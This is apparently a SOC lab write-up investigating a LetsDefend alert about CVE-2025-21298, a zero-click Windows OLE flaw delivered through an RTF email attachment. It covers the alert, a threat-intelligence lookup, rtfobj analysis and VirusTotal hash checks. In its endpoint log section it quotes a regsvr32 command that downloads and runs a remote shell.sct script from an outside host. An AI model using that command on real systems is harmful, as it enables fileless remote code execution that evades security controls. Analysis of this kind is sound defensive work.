Investigating CVE-2025–21298: Zero-Click OLE Exploitation in a Targeted Attack
CVE-2025–21298 is a critical zero-click vulnerability in Windows OLE (Object Linking and Embedding), a technology that allows objects like images, charts, and other content to be embedded and linked within documents. This flaw enables attackers to execute malicious code on a victim’s system without requiring any user interaction, making it particularly dangerous.
The issue originates from a memory corruption vulnerability in the ole32.dll library, a core component that handles object linking and embedding in Windows. Specifically, the vulnerability is triggered when OLE objects are embedded in documents like Rich Text Format (RTF) files.
When a victim opens or even previews a malicious RTF file containing an embedded OLE object, the flaw is exploited. This leads to a buffer overflow or use-after-free condition in ole32.dll, allowing the attacker to gain control over the victim’s memory and execute arbitrary code. The attacker could then take full control of the system, installing malware, exfiltrating sensitive data, or even gaining complete access to the system.
Investigation of the Alert from LetsDefend
Let’s begin investigating the alert from LetsDefend.
The alert shows that on February 4, 2025, at 4:18 PM, an email was received by Austin@letsdefend.io from projectmanagement@pm.me. The email contained an attachment that was flagged as malicious by security monitoring systems. This suggests the attachment may be carrying harmful content such as malware, exploit code, or other malicious payloads designed to compromise the recipient’s system.
Let’s query the IP address in the built-in threat intelligence feed, and we can see that it is flagged as malicious.
This indicates that the IP address has been previously associated with suspicious or harmful activities.
Further Examination of the Email Sent to Austin
Let’s take a closer look at the email that was sent to Austin.
The email includes an attachment that is available for download. This provides an opportunity to investigate the file further. Before we conduct a detailed analysis of the attachment, we’ll perform some initial incident analysis to understand the context and identify potential risks.
Checking Executed Commands on Austin’s Endpoint
The executed command reveals that regsvr32.exe, a trusted Windows utility, was used to download and execute a remote script (shell.sct) from http://84.38.130.118.com, using the scrobj.dll library for script execution. This is a common tactic in fileless malware attacks, where malicious code is executed directly in memory, bypassing traditional file-based security controls. To understand the series of events leading to the execution of this suspicious command, we observe that Outlook initiated the process with CMD as its parent, executing the command:
"C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:http://84.38.130.118.com/shell.sct scrobj.dll"
This is highly suspicious, as it involves CMD executing regsvr32.exe, a legitimate Windows utility typically used to register or unregister DLL files. However, in this case, it is used with unusual arguments:
/s(silent mode) to suppress prompts./u(unregister) flag, which is typically used to unregister a DLL./i:<http://84.38.130.118.com/shell.sct> points to an external shell.sct script hosted on a remote server, suggesting a download attempt of potentially malicious content.- scrobj.dll, a Windows scripting library, is involved, indicating that the downloaded script might be executed by leveraging this DLL for automation or script execution.
Following this, regsvr32.exe is spawned by cmd.exe, which downloads the shell.sct script from the specified URL and executes it using the scrobj.dll library. This sequence could enable the execution of malicious code, leading to further exploitation. The use of regsvr32.exe to execute external scripts is a well-known tactic (T1218, T1059.004, T1071.001) leveraged in malicious campaigns to bypass security filters. Since regsvr32.exe is a trusted system utility typically used for registering and unregistering DLLs, it is often whitelisted by security tools. This makes it a favored method for attackers to carry out their operations without raising alarms, even though the process is being exploited for malicious purposes.
According to log management, the fact that the web request to fetch the shell.sct script was permitted indicates that Austin’s endpoint allowed the download of the malicious file from the remote server.
Analysis of the Malicious Attachment
To ensure a safe and controlled environment for analysis, I utilized the sandbox provided by LetsDefend to open the file and examine its contents.
Using rtfobj to Examine Embedded Objects
rtfobj is a specialized tool for analyzing and extracting embedded objects from Rich Text Format (RTF) files. RTF files often contain embedded objects, including OLE objects, images, scripts, and macros, which can be used to deliver malicious payloads or exploits.
In this case, we used rtfobj to analyze the embedded object within the attachment. This tool helps us understand what is embedded within the RTF file and whether any malicious payloads are present.
The response from rtfobj provides important details about the embedded OLE object in the mail.rtf file:
Format ID: 2 (Embedded): This indicates that the object is embedded within the RTF file rather than linked externally.
- Class Name: StaticDib: This suggests that the object is an embedded image object (device-independent bitmap), which is commonly used in Microsoft Office and RTF files.
- Data Size: 4 bytes: The actual binary data embedded in the object is very small (4 bytes), which could indicate a small payload, command, or identifier for further exploitation.
- MD5 Hash: The MD5 hash
f1d3ff8443297732862df21dc4e57262is associated with the object. We can use this hash to check if it matches any known malicious payloads or samples in security databases (e.g., VirusTotal).
Looking Up Hashes on VirusTotal
I created a script to efficiently check the hashes against VirusTotal for immediate intelligence insights. The hash of the RTF file was flagged by 16 security vendors, indicating it was recognized as malicious. However, the hash of the embedded object was not flagged by any vendors.
malicious rtf hash: 9d68678aeee52684bbe3c983222b1da3
embedded object hash: f1d3ff8443297732862df21dc4e57262
To learn more about the script, visit GitHub — PowerShell Security Tools.
In this investigation, we analyzed an attack leveraging a zero-click vulnerability (CVE-2025–21298) to exploit Windows OLE technology. Through careful examination of the email, attachments, and executed commands, we identified the use of regsvr32.exe for downloading and executing a malicious script. Our findings highlight the effectiveness of using legitimate system processes in evading detection.
